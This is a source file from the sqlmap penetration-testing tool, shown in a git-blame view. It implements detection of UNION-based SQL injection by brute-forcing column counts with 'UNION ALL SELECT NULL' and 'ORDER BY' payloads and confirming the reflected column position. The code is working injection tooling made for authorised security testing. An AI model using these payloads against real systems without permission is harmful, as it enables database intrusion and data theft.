sqlmap/lib/techniques/inband/union/test.py

213 lines
6.6 KiB
Python
Raw Normal View History

2008-10-15 19:38:22 +04:00
#!/usr/bin/env python
"""
2008-10-15 19:56:32 +04:00
$Id$
2008-10-15 19:38:22 +04:00
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
2010-10-15 03:18:29 +04:00
See the file 'doc/COPYING' for copying permission
2008-10-15 19:38:22 +04:00
"""
from lib.core.agent import agent
from lib.core.common import randomStr
2008-10-15 19:38:22 +04:00
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
2008-10-15 19:38:22 +04:00
from lib.core.session import setUnion
from lib.core.unescaper import unescaper
from lib.parse.html import htmlParser
2008-10-15 19:38:22 +04:00
from lib.request.connect import Connect as Request
def __unionPosition(negative=False, falseCond=False):
validPayload = None
if negative or falseCond:
negLogMsg = "partial (single entry)"
else:
negLogMsg = "full"
infoMsg = "confirming %s inband sql injection on parameter " % negLogMsg
infoMsg += "'%s'" % kb.injParameter
if negative:
infoMsg += " with negative parameter value"
elif falseCond:
infoMsg += " by appending a false condition after the parameter value"
logger.info(infoMsg)
# For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability
for exprPosition in range(0, kb.unionCount):
# Prepare expression with delimiters
randQuery = randomStr()
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, exprPosition)
payload = agent.payload(newValue=query, negative=negative, falseCond=falseCond)
# Perform the request
resultPage, _ = Request.queryPage(payload, content=True)
# We have to assure that the randQuery value is not within the
# HTML code of the result page because, for instance, it is there
# when the query is wrong and the back-end DBMS is Microsoft SQL
# server
htmlParsed = htmlParser(resultPage)
2010-09-13 19:22:29 +04:00
if resultPage and randQuery in resultPage and not htmlParsed:
setUnion(position=exprPosition)
validPayload = payload
break
if isinstance(kb.unionPosition, int):
infoMsg = "the target url is affected by an exploitable "
infoMsg += "%s inband sql injection vulnerability " % negLogMsg
infoMsg += "on parameter '%s'" % kb.injParameter
logger.info(infoMsg)
else:
warnMsg = "the target url is not affected by an exploitable "
warnMsg += "%s inband sql injection vulnerability " % negLogMsg
warnMsg += "on parameter '%s'" % kb.injParameter
if negLogMsg == "partial":
warnMsg += ", sqlmap will retrieve the query output "
warnMsg += "through blind sql injection technique"
logger.warn(warnMsg)
return validPayload
def __unionConfirm():
validPayload = None
# Confirm the inband SQL injection and get the exact column
# position
if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition()
# Assure that the above function found the exploitable full inband
# SQL injection position
if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition(negative=True)
# Assure that the above function found the exploitable partial
2010-10-26 03:39:55 +04:00
# (single entry) inband SQL injection position with negative
# parameter validPayload
if not isinstance(kb.unionPosition, int):
validPayload = __unionPosition(falseCond=True)
# Assure that the above function found the exploitable partial
2010-10-26 03:39:55 +04:00
# (single entry) inband SQL injection position by appending
# a false condition after the parameter validPayload
if not isinstance(kb.unionPosition, int):
return
else:
2010-10-26 03:39:55 +04:00
setUnion(falseCond=True)
else:
2010-10-26 03:39:55 +04:00
setUnion(negative=True)
return validPayload
def __unionTestByNULLBruteforce(comment):
2008-10-15 19:38:22 +04:00
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 50 columns
on the target database table
"""
columns = None
2010-10-25 18:11:47 +04:00
query = agent.prefixQuery("UNION ALL SELECT NULL")
2008-10-15 19:38:22 +04:00
for count in range(0, 50):
if kb.dbms == "Oracle" and query.endswith(" FROM DUAL"):
query = query[:-len(" FROM DUAL")]
if count:
query += ", NULL"
if kb.dbms == "Oracle":
query += " FROM DUAL"
commentedQuery = agent.postfixQuery(query, comment)
payload = agent.payload(newValue=commentedQuery)
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
2008-10-15 19:38:22 +04:00
if seqMatcher >= 0.6:
columns = count + 1
break
2008-10-15 19:38:22 +04:00
return columns
2008-10-15 19:38:22 +04:00
def __unionTestByOrderBy(comment):
columns = None
prevPayload = ""
for count in range(1, 51):
2010-10-25 18:11:47 +04:00
query = agent.prefixQuery("ORDER BY %d" % count)
orderByQuery = agent.postfixQuery(query, comment)
payload = agent.payload(newValue=orderByQuery)
seqMatcher = Request.queryPage(payload, getSeqMatcher=True)
if seqMatcher >= 0.6:
columns = count
elif columns:
break
prevPayload = payload
return columns
2008-10-15 19:38:22 +04:00
def unionTest():
"""
This method tests if the target url is affected by an inband
SQL injection vulnerability. The test is done up to 3*50 times
"""
if conf.direct:
return
if kb.unionCount is not None and kb.unionPosition is not None:
return
if conf.uTech == "orderby":
technique = "ORDER BY clause bruteforcing"
else:
technique = "NULL bruteforcing"
infoMsg = "testing inband sql injection on parameter "
2010-01-15 20:42:46 +03:00
infoMsg += "'%s' with %s technique" % (kb.injParameter, technique)
logger.info(infoMsg)
2008-10-15 19:38:22 +04:00
validPayload = None
columns = None
2008-10-15 19:38:22 +04:00
for comment in (queries[kb.dbms].comment.query, ""):
if conf.uTech == "orderby":
columns = __unionTestByOrderBy(comment)
else:
columns = __unionTestByNULLBruteforce(comment)
if columns:
setUnion(comment=comment, count=columns)
2008-10-15 19:38:22 +04:00
break
if kb.unionCount:
validPayload = __unionConfirm()
2008-10-15 19:38:22 +04:00
else:
warnMsg = "the target url is not affected by an "
warnMsg += "inband sql injection vulnerability"
logger.warn(warnMsg)
if validPayload is None:
validPayload = ""
return validPayload